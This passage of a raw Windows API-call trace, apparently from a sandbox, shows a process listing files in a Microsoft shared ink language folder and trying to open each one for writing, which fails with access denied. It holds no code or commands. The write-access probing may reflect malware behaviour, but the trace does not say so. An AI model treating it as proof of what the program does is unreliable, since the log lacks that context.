(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0082.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.540] AreFileApisANSI () returned 1 [0082.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi", lpUsedDefaultChar=0x0) returned 68 [0082.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0082.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0082.541] AreFileApisANSI () returned 1 [0082.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0082.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82b98 [0082.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 68 [0082.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.541] GetFileType (hFile=0x334) returned 0x1 [0082.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0082.541] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.541] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.542] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.542] CloseHandle (hObject=0x334) returned 1 [0082.542] AreFileApisANSI () returned 1 [0082.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0082.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82ef8 [0082.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x82ef8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi") returned 68 [0082.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.542] GetLastError () returned 0x5 [0082.542] GetLastError () returned 0x5 [0082.542] SetLastError (dwErrCode=0x5) [0082.542] GetLastError () returned 0x5 [0082.542] SetLastError (dwErrCode=0x5) [0082.542] GetLastError () returned 0x5 [0082.542] SetLastError (dwErrCode=0x5) [0082.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0082.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0082.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.543] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da3ec5f, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7bf3d600, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81410 [0082.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0082.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.544] AreFileApisANSI () returned 1 [0082.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui", lpUsedDefaultChar=0x0) returned 85 [0082.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0082.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0082.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.544] AreFileApisANSI () returned 1 [0082.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0082.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81860 [0082.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81860, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 85 [0082.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.545] GetFileType (hFile=0x334) returned 0x1 [0082.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0082.545] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.545] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.545] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.546] CloseHandle (hObject=0x334) returned 1 [0082.546] AreFileApisANSI () returned 1 [0082.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0082.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81638 [0082.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81638, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui") returned 85 [0082.546] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\FlickLearningWizard.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\flicklearningwizard.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.546] GetLastError () returned 0x5 [0082.546] GetLastError () returned 0x5 [0082.546] SetLastError (dwErrCode=0x5) [0082.546] GetLastError () returned 0x5 [0082.546] SetLastError (dwErrCode=0x5) [0082.546] GetLastError () returned 0x5 [0082.546] SetLastError (dwErrCode=0x5) [0082.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0082.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0082.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.546] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.546] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dab1374, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7e563000, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0082.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0082.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0082.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.547] AreFileApisANSI () returned 1 [0082.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui", lpUsedDefaultChar=0x0) returned 72 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0082.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0082.548] AreFileApisANSI () returned 1 [0082.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0082.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned 72 [0082.548] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.549] GetFileType (hFile=0x334) returned 0x1 [0082.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0082.549] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0082.549] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0082.549] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0082.549] CloseHandle (hObject=0x334) returned 1 [0082.549] AreFileApisANSI () returned 1 [0082.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0082.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0082.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui") returned 72 [0082.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\InkObj.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\inkobj.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.550] GetLastError () returned 0x5 [0082.550] GetLastError () returned 0x5 [0082.550] SetLastError (dwErrCode=0x5) [0082.550] GetLastError () returned 0x5 [0082.550] SetLastError (dwErrCode=0x5) [0082.550] GetLastError () returned 0x5 [0082.550] SetLastError (dwErrCode=0x5) [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0082.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.550] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d9f27a8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7dc8925d, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0x7f875d00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0082.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0082.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0082.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 